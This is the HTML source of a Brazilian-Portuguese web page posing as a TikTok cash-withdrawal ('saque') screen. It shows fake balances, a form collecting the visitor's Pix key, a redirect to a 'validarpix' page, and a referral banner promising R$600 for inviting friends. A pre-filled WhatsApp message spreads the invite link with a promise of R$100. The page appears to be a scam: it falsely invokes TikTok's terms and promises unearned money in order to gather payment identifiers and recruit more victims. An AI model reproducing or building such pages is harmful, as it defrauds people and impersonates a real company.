			<svg xmlns="http://www.w3.org/2000/svg" height="886" viewBox="-1.165 -.17395293 238.183 85.60195293" width="2500"><path d="m97.827 78.68v-48.324c0-8.892 7.208-16.1 16.1-16.1l14.268.022c8.865.018 16.043 7.21 16.043 16.076v10.286c0 8.891-7.208 16.1-16.1 16.1h-20.161m40.248-42.49h6.19a6.607 6.607 0 0 1 6.606 6.607v36.099" style="fill:none;stroke:#939598;stroke-width:2.976;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10"></path><path d="m159.695 8.657-2.807-2.807a1.783 1.783 0 0 1 0-2.522l2.805-2.805a1.786 1.786 0 0 1 2.525 0l2.805 2.805a1.783 1.783 0 0 1 0 2.522l-2.806 2.807a1.783 1.783 0 0 1 -2.522 0" fill="#32bcad"></path><path d="m172.895 14.218h6.138c3.158 0 6.186 1.254 8.419 3.487l14.356 14.356a4.762 4.762 0 0 0 6.735 0l14.304-14.304a11.906 11.906 0 0 1 8.418-3.487h4.99m-63.36 42.37h6.138c3.158 0 6.186-1.255 8.419-3.487l14.356-14.357a4.762 4.762 0 0 1 6.735 0l14.304 14.304a11.906 11.906 0 0 0 8.418 3.487h4.99" style="fill:none;stroke:#939598;stroke-width:2.976;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10"></path><path d="m61.233 65.811c-3.08 0-5.977-1.2-8.156-3.376l-11.777-11.778c-.827-.829-2.268-.826-3.094 0l-11.82 11.82a11.463 11.463 0 0 1 -8.156 3.377h-2.321l14.916 14.916c4.658 4.658 12.21 4.658 16.869 0l14.958-14.96zm-43.003-41.656c3.08 0 5.977 1.199 8.156 3.376l11.82 11.822a2.19 2.19 0 0 0 3.094 0l11.777-11.779a11.463 11.463 0 0 1 8.156-3.376h1.419l-14.958-14.959c-4.659-4.658-12.211-4.658-16.87 0l-14.914 14.916z" fill="#32bcad"></path><path d="m75.024 36.57-9.039-9.04c-.199.08-.414.13-.642.13h-4.11a8.123 8.123 0 0 0 -5.706 2.365l-11.776 11.775a5.637 5.637 0 0 1 -3.997 1.654 5.637 5.637 0 0 1 -3.997-1.653l-11.821-11.82a8.121 8.121 0 0 0 -5.706-2.365h-5.054c-.215 0-.417-.05-.607-.122l-9.075 9.076c-4.659 4.658-4.659 12.21 0 16.87l9.075 9.074c.19-.072.392-.122.607-.122h5.054a8.122 8.122 0 0 0 5.706-2.364l11.82-11.82c2.136-2.135 5.86-2.136 7.995 0l11.776 11.776a8.123 8.123 0 0 0 5.706 2.365h4.11c.228 0 .443.05.642.13l9.04-9.04c4.658-4.658 4.658-12.21 0-16.87" fill="#32bcad"></path><path d="m110.097 74.573c-.667 0-1.444.16-2.212.337v2.945c.532.194 1.14.288 1.722.288 1.477 0 2.177-.498 2.177-1.8 0-1.222-.573-1.77-1.687-1.77m-2.71 5.468v-5.823h.406l.042.253c.683-.16 1.628-.371 2.304-.371.549 0 1.072.084 1.51.438.507.415.667 1.08.667 1.806 0 .76-.253 1.478-.945 1.874-.481.27-1.13.38-1.713.38-.6 0-1.173-.093-1.773-.27v1.713zm8.637-5.486c-1.477 0-2.136.465-2.136 1.764 0 1.258.65 1.823 2.136 1.823 1.468 0 2.126-.456 2.126-1.755 0-1.258-.65-1.832-2.126-1.832m1.898 3.587c-.49.354-1.147.456-1.898.456-.768 0-1.427-.11-1.908-.456-.54-.38-.76-1.004-.76-1.788 0-.778.22-1.41.76-1.799.481-.345 1.14-.455 1.908-.455.759 0 1.409.11 1.898.455.55.39.76 1.021.76 1.789 0 .786-.22 1.419-.76 1.798m6.992.338-1.646-3.536h-.034l-1.62 3.536h-.448l-1.755-4.262h.549l1.46 3.578h.034l1.586-3.578h.455l1.63 3.578h.033l1.427-3.578h.531l-1.755 4.262zm5.386-3.933c-1.367 0-1.832.607-1.916 1.486h3.832c-.042-.97-.54-1.486-1.916-1.486m-.017 4.05c-.82 0-1.35-.117-1.772-.472-.498-.43-.667-1.054-.667-1.772 0-.683.228-1.409.793-1.823.473-.329 1.055-.43 1.663-.43.549 0 1.181.059 1.704.414.617.413.735 1.14.735 1.966h-4.372c.017.877.304 1.654 1.958 1.654.785 0 1.52-.127 2.203-.245v.447c-.71.127-1.494.262-2.245.262m3.885-.118v-4.262h.405l.042.253c.903-.227 1.325-.371 2.119-.371h.059v.473h-.119c-.666 0-1.071.092-2.008.337v3.57zm5.517-3.933c-1.367 0-1.831.607-1.916 1.486h3.832c-.042-.97-.54-1.486-1.916-1.486m-.017 4.05c-.819 0-1.35-.117-1.772-.472-.499-.43-.667-1.054-.667-1.772 0-.683.228-1.409.793-1.823.473-.329 1.055-.43 1.663-.43.549 0 1.182.059 1.704.414.617.413.735 1.14.735 1.966h-4.372c.017.877.304 1.654 1.958 1.654.785 0 1.519-.127 2.203-.245v.447c-.71.127-1.494.262-2.245.262m7.911-3.755a5.112 5.112 0 0 0 -1.722-.288c-1.476 0-2.177.499-2.177 1.798 0 1.232.574 1.772 1.687 1.772.667 0 1.444-.16 2.212-.33zm.093 3.637-.042-.254c-.684.16-1.63.372-2.305.372-.548 0-1.071-.076-1.51-.439-.507-.414-.667-1.08-.667-1.806 0-.76.253-1.477.945-1.865.481-.279 1.131-.388 1.722-.388.59 0 1.165.101 1.764.27v-1.95h.498v6.06zm7.706-3.907c-.667 0-1.443.16-2.211.337v2.937c.54.202 1.14.296 1.722.296 1.476 0 2.177-.498 2.177-1.8 0-1.222-.574-1.77-1.688-1.77m1.274 3.645c-.48.27-1.13.38-1.713.38a6.07 6.07 0 0 1 -1.907-.32l-.026.202h-.338v-6.06h.499v2.034c.683-.151 1.603-.354 2.253-.354.55 0 1.072.084 1.51.438.507.415.667 1.08.667 1.806 0 .76-.253 1.478-.945 1.874m1.606 1.899v-.464c.245.025.473.043.634.043.616 0 .987-.178 1.333-.879l.16-.337-2.228-4.262h.574l1.908 3.68h.033l1.815-3.68h.565l-2.397 4.785c-.438.87-.911 1.156-1.78 1.156-.195 0-.405-.016-.617-.042m11.657-4.067h-1.654v1.494h1.662c1.14 0 1.57-.128 1.57-.752 0-.667-.59-.743-1.578-.743m-.303-2.422h-1.35v1.519h1.358c1.122 0 1.57-.135 1.57-.768 0-.674-.566-.751-1.578-.751m2.565 4.448c-.608.388-1.342.405-2.684.405h-2.523v-5.781h2.464c1.156 0 1.865.016 2.456.371.422.254.59.642.59 1.148 0 .607-.252 1.013-.911 1.283v.033c.743.17 1.224.55 1.224 1.368 0 .557-.202.92-.616 1.173m5.665-1.385a17.866 17.866 0 0 0 -1.536-.067c-.87 0-1.174.178-1.174.574 0 .371.254.574.92.574.557 0 1.224-.126 1.79-.254zm.253 1.79-.034-.254c-.726.178-1.57.372-2.312.372-.457 0-.946-.06-1.292-.313-.32-.227-.472-.599-.472-1.029 0-.482.21-.929.717-1.156.447-.211 1.047-.228 1.595-.228.447 0 1.046.025 1.545.06v-.077c0-.667-.44-.886-1.638-.886-.464 0-1.03.025-1.57.075v-.86c.6-.05 1.275-.084 1.832-.084.742 0 1.511.059 1.983.396.49.347.583.828.583 1.46v2.524zm6.501 0v-2.355c0-.776-.396-1.055-1.106-1.055-.522 0-1.18.135-1.738.27v3.14h-1.19v-4.262h.97l.043.27c.75-.194 1.587-.388 2.279-.388.523 0 1.055.075 1.46.439.337.304.464.725.464 1.333v2.608zm4.544.118c-.549 0-1.149-.076-1.587-.447-.523-.422-.675-1.089-.675-1.807 0-.675.22-1.409.869-1.822.532-.347 1.19-.422 1.874-.422.49 0 .97.034 1.502.084v.911c-.431-.041-.946-.075-1.359-.075-1.131 0-1.662.355-1.662 1.333 0 .92.396 1.317 1.324 1.317.54 0 1.174-.102 1.79-.22v.878c-.667.135-1.393.27-2.076.27m5.59-3.604c-1.13 0-1.628.355-1.628 1.325 0 .971.49 1.385 1.629 1.385 1.122 0 1.611-.347 1.611-1.317 0-.971-.48-1.393-1.611-1.393m2.042 3.157c-.523.354-1.207.447-2.042.447-.853 0-1.536-.102-2.05-.447-.592-.388-.803-1.03-.803-1.798s.211-1.418.802-1.806c.515-.346 1.198-.447 2.05-.447.845 0 1.52.101 2.043.447.59.388.793 1.038.793 1.797 0 .769-.21 1.419-.793 1.807m7.664.447c-.717 0-1.494-.118-2.076-.6-.692-.573-.903-1.46-.903-2.414 0-.851.27-1.864 1.173-2.455.7-.455 1.57-.548 2.447-.548.642 0 1.3.042 2.018.101v1.038a26.08 26.08 0 0 0 -1.967-.093c-1.646 0-2.346.625-2.346 1.957 0 1.36.65 1.968 1.865 1.968.793 0 1.68-.16 2.574-.347v1.03c-.895.178-1.832.363-2.785.363m6.282-3.738c-.988 0-1.368.354-1.444 1.004h2.87c-.034-.692-.44-1.005-1.426-1.005m-.178 3.739c-.7 0-1.333-.084-1.806-.473-.506-.421-.684-1.055-.684-1.78 0-.65.212-1.376.803-1.798.522-.371 1.19-.447 1.865-.447.607 0 1.325.067 1.848.43.684.481.743 1.224.75 2.102h-4.05c.025.65.371 1.072 1.57 1.072.742 0 1.57-.11 2.27-.22v.836c-.819.135-1.713.278-2.566.278m8.071-.118v-2.355c0-.776-.396-1.055-1.105-1.055-.524 0-1.181.135-1.739.27v3.14h-1.19v-4.262h.97l.043.27c.75-.194 1.587-.388 2.279-.388.523 0 1.055.075 1.46.439.337.304.464.725.464 1.333v2.608zm4.569.118c-.574 0-1.097-.16-1.384-.608-.21-.304-.312-.716-.312-1.29v-1.596h-.861v-.886h.86l.128-1.292h1.054v1.292h1.68v.886h-1.68v1.367c0 .33.025.608.118.81.127.287.405.397.777.397.278 0 .616-.042.852-.084v.852c-.388.076-.836.152-1.232.152m2.326-.118v-4.262h.97l.043.27c.785-.22 1.367-.388 2.11-.388.033 0 .084 0 .151.008v1.013c-.135-.008-.295-.008-.413-.008-.583 0-1.021.067-1.672.22v3.147zm7.6-1.79a17.86 17.86 0 0 0 -1.536-.067c-.869 0-1.173.178-1.173.574 0 .371.253.574.92.574.557 0 1.224-.126 1.79-.254zm.253 1.79-.033-.254c-.726.178-1.57.372-2.313.372-.456 0-.945-.06-1.291-.313-.32-.227-.473-.599-.473-1.029 0-.482.212-.929.718-1.156.447-.211 1.046-.228 1.595-.228.447 0 1.046.025 1.544.06v-.077c0-.667-.439-.886-1.637-.886-.464 0-1.03.025-1.57.075v-.86c.599-.05 1.275-.084 1.832-.084.742 0 1.51.059 1.983.396.49.347.582.828.582 1.46v2.524zm2.468-6.06h1.19v6.06h-1.19z" fill="#939598"></path></svg>			</div>
		</div>
						</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-74304b4 e-con-full e-flex e-con e-child" data-id="74304b4" data-element_type="container">
				<div class="elementor-element elementor-element-796f1ab elementor-widget-mobile__width-inherit elementor-widget elementor-widget-html" data-id="796f1ab" data-element_type="widget" data-widget_type="html.default">
				<div class="elementor-widget-container">
					<div class="elementor-element elementor-element-5beb914 elementor-widget elementor-widget-html" data-id="5beb914" data-element_type="widget" data-widget_type="html.default">
				<div class="elementor-widget-container">
					


    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Grupo de Botões</title>
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@600&amp;display=swap" rel="stylesheet"> <!-- Fonte Inter importada -->
    <style>
        /* Estilo do container */
        .container {
            display: flex; /* Usando flexbox para os botões se ajustarem automaticamente */
            flex-wrap: wrap; /* Permite que os botões se movam para a linha seguinte se necessário */
            gap: 10px; /* Espaçamento entre os botões */
            justify-content: center; /* Centraliza os botões no container */
            padding: 0; /* Remove o padding ao redor do container */
            margin: 0; /* Remove a margem ao redor do container */
            background-color: transparent; /* Garantindo que não haja fundo */
            border: none; /* Remove qualquer borda do container */
        }

        /* Estilo básico dos botões */
        .toggle-button {
            padding: 12px 24px;
            font-size: 16px;
            color: #000000; /* Cor do texto do botão não selecionado (preto) */
            background-color: #F6F2F6; /* Cor de fundo do botão não selecionado */
            border: 2px solid transparent; /* Sem borda inicialmente */
            border-radius: 4px;
            cursor: pointer;
            flex-grow: 1; /* Faz os botões crescerem para preencher o espaço disponível */
            max-width: 150px; /* Tamanho máximo para cada botão */
            font-family: 'Inter', sans-serif; /* Definindo a fonte como Inter */
            font-weight: 600; /* Peso 600 para a fonte */
            transition: background-color 0.3s ease, color 0.3s ease, border-color 0.3s ease;
            text-align: center;
        }

        /* Estado selecionado */
        .toggle-button.selected {
            background-color: #FFF3F8; /* Cor de fundo quando selecionado */
            color: #FF3661; /* Cor do texto quando selecionado */
            border-color: #FF3661; /* Cor da borda quando selecionado */
        }

        /* Efeito hover removido (mantém o fundo e texto original) */
        .toggle-button:hover {
            background-color: #F6F2F6; /* Cor de fundo permanece a mesma */
            color: #000000; /* Cor do texto permanece preta */
        }

        /* Responsividade para telas pequenas */
        @media (max-width: 600px) {
            .toggle-button {
                font-size: 14px;
                padding: 10px 20px;
                max-width: 100%; /* Permite que os botões ocupem toda a largura disponível em telas pequenas */
            }
        }
    </style>


    <div class="container">
        <button class="toggle-button" style="background-color: rgb(246, 242, 246); color: rgb(0, 0, 0);">R$1.5</button>
        <button class="toggle-button" style="background-color: rgb(246, 242, 246); color: rgb(0, 0, 0);">R$5</button>
        <button class="toggle-button selected" style="background-color: rgb(255, 243, 248); color: rgb(255, 54, 97);">R$10</button>
        <button class="toggle-button" style="background-color: rgb(246, 242, 246); color: rgb(0, 0, 0);">R$559.51</button>
    </div>

    <script>
        // Quando o DOM estiver carregado
        document.addEventListener("DOMContentLoaded", () => {
            const buttons = document.querySelectorAll(".toggle-button");

            // Função para gerenciar a seleção e alteração de estilo
            buttons.forEach(button => {
                button.addEventListener("click", () => {
                    // Se o botão não estiver selecionado
                    if (!button.classList.contains("selected")) {
                        // Remover seleção de todos os botões
                        buttons.forEach(btn => {
                            btn.classList.remove("selected");
                            btn.style.backgroundColor = '#F6F2F6'; // Resetando a cor de fundo para #F6F2F6
                            btn.style.color = '#000000'; // Resetando a cor do texto para #000000
                        });
                        
                        // Mudar a cor de fundo do botão clicado para #FFF3F8
                        button.style.backgroundColor = '#FFF3F8';
                        
                        // Mudar a cor do texto do botão para #FF3661
                        button.style.color = '#FF3661';
                        
                        // Adicionar seleção ao botão clicado
                        button.classList.add("selected");
                    } else {
                        // Se o botão já estiver selecionado, remova a seleção
                        button.classList.remove("selected");

                        // Alterar a cor de fundo e do texto de volta
                        button.style.backgroundColor = '#F6F2F6'; // Retorna à cor original
                        button.style.color = '#000000'; // Retorna à cor original do texto
                    }
                });
            });
        });
    </script>


				</div>
				</div>				</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-81e5a97 e-con-full e-flex e-con e-child" data-id="81e5a97" data-element_type="container">
				<div class="elementor-element elementor-element-eda5f49 elementor-mobile-button-align-stretch form-2 elementor-button-align-stretch elementor-widget elementor-widget-form" data-id="eda5f49" data-element_type="widget" data-settings="{" step_next_label":"pr\u00f3ximo","step_previous_label":"anterior","button_width":"100","step_type":"number_text","step_icon_shape":"circle"}"="" data-widget_type="form.default">
				<div class="elementor-widget-container">
							<form class="elementor-form" method="post" name="Chave Pix">
			<input type="hidden" name="post_id" value="1174">
			<input type="hidden" name="form_id" value="eda5f49">
			<input type="hidden" name="referer_title" value="Saque">

							<input type="hidden" name="queried_id" value="1174">
			
			<div class="elementor-form-fields-wrapper elementor-labels-">
								<div class="elementor-field-type-select elementor-field-group elementor-column elementor-field-group-tipodechavepix elementor-col-100 elementor-field-required">
												<label for="form-field-tipodechavepix" class="elementor-field-label elementor-screen-only">
								Selecione o tipo de chave:							</label>
								<div class="elementor-field elementor-select-wrapper remove-before ">
			<div class="select-caret-down-wrapper">
				<i aria-hidden="true" class="eicon-caret-down"></i>			</div>
			<select name="form_fields[tipodechavepix]" id="form-field-tipodechavepix" class="elementor-field-textual elementor-size-md" required="required" aria-required="true">
									<option value="Selecione o tipo de chave:">Selecione o tipo de chave:</option>
									<option value="CPF">CPF</option>
									<option value="E-mail">E-mail</option>
									<option value="Telefone">Telefone</option>
									<option value="Chave Aleatória">Chave Aleatória</option>
							</select>
		</div>
						</div>
								<div class="elementor-field-type-text elementor-field-group elementor-column elementor-field-group-chavepix elementor-col-100 elementor-field-required">
												<label for="form-field-chavepix" class="elementor-field-label elementor-screen-only">
								Chave Pix							</label>
														<input size="1" type="text" name="form_fields[chavepix]" id="form-field-chavepix" class="elementor-field elementor-size-md  elementor-field-textual" placeholder="Digite a sua chave PIX" required="required" aria-required="true">
											</div>
								<div class="elementor-field-group elementor-column elementor-field-type-submit elementor-col-100 e-form__buttons">
					<button class="elementor-button elementor-size-md" type="submit">
						<span class="elementor-button-content-wrapper">
																						<span class="elementor-button-text">Realizar Saque</span>
													</span>
					</button>
				</div>
			</div>
		</form>
						</div>
				</div>
				<div class="elementor-element elementor-element-df41b99 elementor-widget elementor-widget-html" data-id="df41b99" data-element_type="widget" data-widget_type="html.default">
				<div class="elementor-widget-container">
					<script>
document.addEventListener('DOMContentLoaded', function() {
  const forms = document.querySelectorAll('.form-2'); // Selecione todos os formulários

  forms.forEach(function(form) {
    form.addEventListener('submit', function(event) {
      event.preventDefault(); // Impede o envio padrão do formulário

      const params = new URLSearchParams(window.location.search);
      const queryString = params.toString();
      const baseUrl = '../validarpix/index.html'; // Defina a URL base

      console.log('Base URL:', baseUrl);
      console.log('Query String:', queryString);

      // Redireciona com os parâmetros da URL
      window.location.href = queryString ? `${baseUrl}?${queryString}` : baseUrl;
    });
  });
});
</script>				</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-ba69f30 e-con-full e-flex e-con e-child" data-id="ba69f30" data-element_type="container">
				<div class="elementor-element elementor-element-ce00de9 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="ce00de9" data-element_type="widget" data-widget_type="divider.default">
				<div class="elementor-widget-container">
							<div class="elementor-divider">
			<span class="elementor-divider-separator">
						</span>
		</div>
						</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-8816514 e-con-full e-flex e-con e-child" data-id="8816514" data-element_type="container">
				<div class="elementor-element elementor-element-65b285b elementor-widget-mobile__width-initial elementor-widget elementor-widget-text-editor" data-id="65b285b" data-element_type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Para sacar o seu dinheiro, você precisa de um saldo mínimo de R$ 1,50. Os limites de saque para transações individuais e mensais podem variar conforme o país ou a região.</p>								</div>
				</div>
				</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-5606eba e-flex e-con-boxed e-con e-parent" data-id="5606eba" data-element_type="container">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-777c81f e-con-full e-flex e-con e-child" data-id="777c81f" data-element_type="container" data-settings="{" background_background":"classic"}"="">
		<div class="elementor-element elementor-element-dd759df e-con-full e-flex e-con e-child" data-id="dd759df" data-element_type="container">
				<div class="elementor-element elementor-element-4e09fdc elementor-widget-mobile__width-initial elementor-widget elementor-widget-heading" data-id="4e09fdc" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">1 de Maio - 30 de Junho</h2>				</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-cfe5a2b e-con-full e-flex e-con e-child" data-id="cfe5a2b" data-element_type="container">
				<div class="elementor-element elementor-element-f81d8a5 elementor-widget elementor-widget-text-editor" data-id="f81d8a5" data-element_type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Convide 2 amigos e ganhe <span style="color: #f9fd20;">R$ 600,00 de saldo para sacar na hora sem pagamento de taxas!</span></p>								</div>
				</div>
				<div class="elementor-element elementor-element-e02cd23 elementor-widget elementor-widget-text-editor" data-id="e02cd23" data-element_type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Convidar. Ganhar recompensas. <br>Repetir!</p>								</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-8da8326 e-con-full e-flex e-con e-child" data-id="8da8326" data-element_type="container">
				<div class="elementor-element elementor-element-2ed4a42 elementor-widget elementor-widget-image" data-id="2ed4a42" data-element_type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
															<img decoding="async" width="281" height="108" src="images/dsdsdsewe.svg" class="attachment-large size-large wp-image-1179" alt="">															</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-00390cc e-con-full e-flex e-con e-child" data-id="00390cc" data-element_type="container">
				<div class="elementor-element elementor-element-34ce6cf elementor-mobile-align-justify elementor-widget elementor-widget-button" data-id="34ce6cf" data-element_type="widget" data-widget_type="button.default">
				<div class="elementor-widget-container">
									<div class="elementor-button-wrapper">
					<a class="elementor-button elementor-button-link elementor-size-sm" href="https://api.whatsapp.com/send?text=Ganhe%20R%24100%20agora!%20Acesse%20meu%20link%20de%20convite,%20insira%20seu%20e-mail%20e%20Pronto!%20Voc%C3%AA%20j%C3%A1%20come%C3%A7a%20com%20R%24100%20na%20conta%20para%20aproveitar.%20Para%20isso,%20%C3%A9%20s%C3%B3%20clicar%20aqui:%20https://appref.site/">
						<span class="elementor-button-content-wrapper">
									<span class="elementor-button-text">CONVIDAR AMIGOS</span>
					</span>
					</a>
				</div>
								</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-29bd32e e-con-full e-flex e-con e-child" data-id="29bd32e" data-element_type="container">
				<div class="elementor-element elementor-element-dfa0b51 elementor-widget-mobile__width-initial elementor-widget elementor-widget-text-editor" data-id="dfa0b51" data-element_type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Código de convite: 
  <span id="convite" style="color: #f9fd20; cursor: pointer;" onclick="copiarCodigo()">24995543</span>
</p>

<script>
function copiarCodigo() {
  var codigo = document.getElementById("convite");
  var textoTemporario = document.createElement("textarea");
  textoTemporario.value = codigo.textContent;
  document.body.appendChild(textoTemporario);
  textoTemporario.select();
  document.execCommand("copy");
  document.body.removeChild(textoTemporario);
  
  // Opcional: Exibir uma mensagem de confirmação
  alert("Código copiado: " + codigo.textContent);
}
</script>
								</div>
				</div>
				<div class="elementor-element elementor-element-cd14589 elementor-widget-mobile__width-initial elementor-view-default elementor-widget elementor-widget-icon" data-id="cd14589" data-element_type="widget" data-widget_type="icon.default">
				<div class="elementor-widget-container">
							<div class="elementor-icon-wrapper">
			<div class="elementor-icon">
			<i aria-hidden="true" class="far fa-copy"></i>			</div>
		</div>
						</div>
				</div>
				</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-2534e6a e-flex e-con-boxed e-con e-parent" data-id="2534e6a" data-element_type="container">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-70e4853 e-con-full e-flex e-con e-child" data-id="70e4853" data-element_type="container" data-settings="{" background_background":"classic"}"="">
		<div class="elementor-element elementor-element-77b0a12 e-con-full e-flex e-con e-child" data-id="77b0a12" data-element_type="container">
				<div class="elementor-element elementor-element-f3550c8 elementor-widget-mobile__width-initial elementor-widget elementor-widget-text-editor" data-id="f3550c8" data-element_type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Como retirar o dinheiro?</p>								</div>
				</div>
				<div class="elementor-element elementor-element-67437aa elementor-widget-mobile__width-initial elementor-widget elementor-widget-text-editor" data-id="67437aa" data-element_type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Insira sua chave PIX, escolha o valor e clique em ‘Sacar’ dinheiro.</p>								</div>
				</div>
				</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-68ca0ab e-flex e-con-boxed e-con e-parent" data-id="68ca0ab" data-element_type="container">
					<div class="e-con-inner">
				<div class="elementor-element elementor-element-d1aa46c elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="d1aa46c" data-element_type="widget" data-widget_type="divider.default">
				<div class="elementor-widget-container">
							<div class="elementor-divider">
			<span class="elementor-divider-separator">
						</span>
		</div>
						</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-5f14b86 e-flex e-con-boxed e-con e-parent" data-id="5f14b86" data-element_type="container">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-7135df5 e-con-full e-flex e-con e-child" data-id="7135df5" data-element_type="container">
				<div class="elementor-element elementor-element-5f19b5c elementor-widget elementor-widget-text-editor" data-id="5f19b5c" data-element_type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Ao continuar, você concorda com os <strong>Termos </strong>e <strong>Condições </strong>do <strong>TikTok</strong>. Os pagamentos são processados pela LLKM INTEMEDIAÇÃO. Consulte Politica de Privacidade da LLKM INTEMEDIAÇÃO.</p>								</div>
				</div>
				</div>
					</div>
				</div>
				</div>
					<script type="text/javascript">
				const lazyloadRunObserver = () => {
					const lazyloadBackgrounds = document.querySelectorAll( `.e-con.e-parent:not(.e-lazyloaded)` );
					const lazyloadBackgroundObserver = new IntersectionObserver( ( entries ) => {
						entries.forEach( ( entry ) => {
							if ( entry.isIntersecting ) {
								let lazyloadBackground = entry.target;
								if( lazyloadBackground ) {
									lazyloadBackground.classList.add( 'e-lazyloaded' );
								}
								lazyloadBackgroundObserver.unobserve( entry.target );
							}
						});
					}, { rootMargin: '200px 0px 200px 0px' } );
					lazyloadBackgrounds.forEach( ( lazyloadBackground ) => {
						lazyloadBackgroundObserver.observe( lazyloadBackground );
					} );
				};
				const events = [
					'DOMContentLoaded',
					'elementor/lazyload/observe',
				];
				events.forEach( ( event ) => {
					document.addEventListener( event, lazyloadRunObserver );
				} );
			</script>
			<script src="js/hello-frontend.min.js" id="hello-theme-frontend-js"></script>
<script src="js/jquery-numerator.min.js" id="jquery-numerator-js"></script>
<script id="eael-general-js-extra">
var localize = {"ajaxurl":"https:\/\/respostaspremiada.com\/wp-admin\/admin-ajax.php","nonce":"3c3e043fe9","i18n":{"added":"Adicionado ","compare":"Comparar","loading":"Carregando..."},"eael_translate_text":{"required_text":"\u00e9 um campo obrigat\u00f3rio","invalid_text":"Inv\u00e1lido","billing_text":"Faturamento","shipping_text":"Envio","fg_mfp_counter_text":"de"},"page_permalink":"https:\/\/respostaspremiada.com\/tiktoksaque\/","cart_redirectition":"","cart_page_url":"","el_breakpoints":{"mobile":{"label":"Dispositivos m\u00f3veis no modo retrato","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Dispositivos m\u00f3veis no modo paisagem","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet no modo retrato","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet no modo paisagem","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Notebook","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Tela ampla (widescreen)","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}};
</script>
<script src="js/general.min.js" id="eael-general-js"></script>
<script src="js/webpack-pro.runtime.min.js" id="elementor-pro-webpack-runtime-js"></script>
<script src="js/webpack.runtime.min.js" id="elementor-webpack-runtime-js"></script>
<script src="js/frontend-modules.min.js" id="elementor-frontend-modules-js"></script>
<script src="js/hooks.min.js" id="wp-hooks-js"></script>
<script src="js/i18n.min.js" id="wp-i18n-js"></script>
<script id="wp-i18n-js-after">
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
</script>
<script id="elementor-pro-frontend-js-before">
var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/respostaspremiada.com\/wp-admin\/admin-ajax.php","nonce":"c34a272719","urls":{"assets":"https:\/\/respostaspremiada.com\/wp-content\/plugins\/elementor-pro\/assets\/","rest":"https:\/\/respostaspremiada.com\/wp-json\/"},"settings":{"lazy_load_background_images":true},"popup":{"hasPopUps":false},"shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"mix":{"title":"Mix"},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"},"x-twitter":{"title":"X"},"threads":{"title":"Threads"}},"facebook_sdk":{"lang":"pt_BR","app_id":""},"lottie":{"defaultAnimationUrl":"https:\/\/respostaspremiada.com\/wp-content\/plugins\/elementor-pro\/modules\/lottie\/assets\/animations\/default.json"}};
</script>
<script src="js/frontend.min.js" id="elementor-pro-frontend-js"></script>
<script src="js/core.min.js" id="jquery-ui-core-js"></script>
<script id="elementor-frontend-js-before">
